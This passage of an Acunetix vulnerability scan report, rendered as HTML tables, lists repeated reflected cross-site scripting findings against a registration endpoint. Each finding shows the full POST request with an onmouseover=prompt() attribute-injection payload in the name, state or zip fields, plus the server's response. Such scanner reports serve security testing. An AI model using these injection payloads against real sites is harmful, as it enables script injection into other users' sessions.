<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:129px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">21</td>
</tr>
</table>
<a name="PageN22"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:120px">
<td colspan="19" class="s43">Accept: */*<br> <br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=%22%20onmouseover%3dprompt%28973612%29%20bad%3d%22&amp;lastName=jcyvqrug&amp;p</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:58 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input lastName was set to &quot; onmouseover=prompt(995790) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 390<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=%22%20onmouseover%3dprompt%28995790%29%20bad%3d%22&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:59 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input lastName was set to &quot; onmouseover=prompt(905429) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:203px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 390<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Lagu</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">22</td>
</tr>
</table>
<a name="PageN23"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:30px">
<td colspan="19" class="s43">na%20Street&amp;firstName=lajitjth&amp;lastName=%22%20onmouseover%3dprompt%28905429%29%20bad%3d</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:00 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input lastName was set to &quot; onmouseover=prompt(921032) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=sefmdqwi&amp;lastName=%22%20onmouseover%3dprompt%28921032%29%20bad%3d%22&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:59 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input lastName was set to &quot; onmouseover=prompt(922177) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=sefmdqwi&amp;lastName=%22%20onmouseover%3dprompt%28922177%29%20bad%3d%22&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:13px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">23</td>
</tr>
</table>
<a name="PageN24"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:59 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input lastName was set to &quot; onmouseover=prompt(924846) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=sefmdqwi&amp;lastName=%22%20onmouseover%3dprompt%28924846%29%20bad%3d%22&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:59 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input state was set to &quot; onmouseover=prompt(913419) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 382<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=synwvmno&amp;lastName=synwvmno&amp;password=acUn3t1x&amp;state=%22%20onmouseover%3dprompt%28913419%29%20bad%3d%22&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:61px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">24</td>
</tr>
</table>
<a name="PageN25"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:31px">
<td colspan="19" class="s43">Date: Sun, 26 Feb 2012 03:15:01 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input state was set to &quot; onmouseover=prompt(905868) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 382<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=synwvmno&amp;lastName=synwvmno&amp;password=acUn3t1x&amp;state=%22%20onmouseover%3dprompt%28905868%29%20bad%3d%22&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:00 GMT<br>Content-Length: 14697</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input state was set to &quot; onmouseover=prompt(919063) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 382<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=synwvmno&amp;lastName=synwvmno&amp;password=acUn3t1x&amp;state=%22%20onmouseover%3dprompt%28919063%29%20bad%3d%22&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:01 GMT<br>Content-Length: 14697</td>
</tr>
<tr style="height:31px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">25</td>
</tr>
</table>
<a name="PageN26"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input state was set to &quot; onmouseover=prompt(905169) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 396<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=lajitjth&amp;lastName=vdqevqkq&amp;password=acUn3t1x&amp;state=%22%20onmouseover%3dprompt%28905169%29%20bad%3d%22&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:01 GMT<br>Content-Length: 14697</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input state was set to &quot; onmouseover=prompt(972278) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 396<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=%22%20onmouseover%3dprompt%28972278%29%20bad%3d%22&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:01 GMT<br>Content-Length: 14697</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input zip was set to &quot; onmouseover=prompt(900026) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">26</td>
</tr>
</table>
<a name="PageN27"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 393<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=NY&amp;zip=%22%20onmouseover%3dprompt%28900026%29%20bad%3d%22</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:02 GMT<br>Content-Length: 14694</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input zip was set to &quot; onmouseover=prompt(986095) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 393<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=lajitjth&amp;lastName=vdqevqkq&amp;password=acUn3t1x&amp;state=NY&amp;zip=%22%20onmouseover%3dprompt%28986095%29%20bad%3d%22</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:02 GMT<br>Content-Length: 14694</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input zip was set to &quot; onmouseover=prompt(941978) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:74px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 379<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">27</td>
</tr>
</table>
<a name="PageN28"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:179px">
<td colspan="19" class="s43">Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=wmnuajmy&amp;lastName=wmnuajmy&amp;password=acUn3t1x&amp;state=NY&amp;zip=%22%20onmous</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:15:02 GMT<br>Content-Length: 14694</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input zip was set to &quot; onmouseover=prompt(976053) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
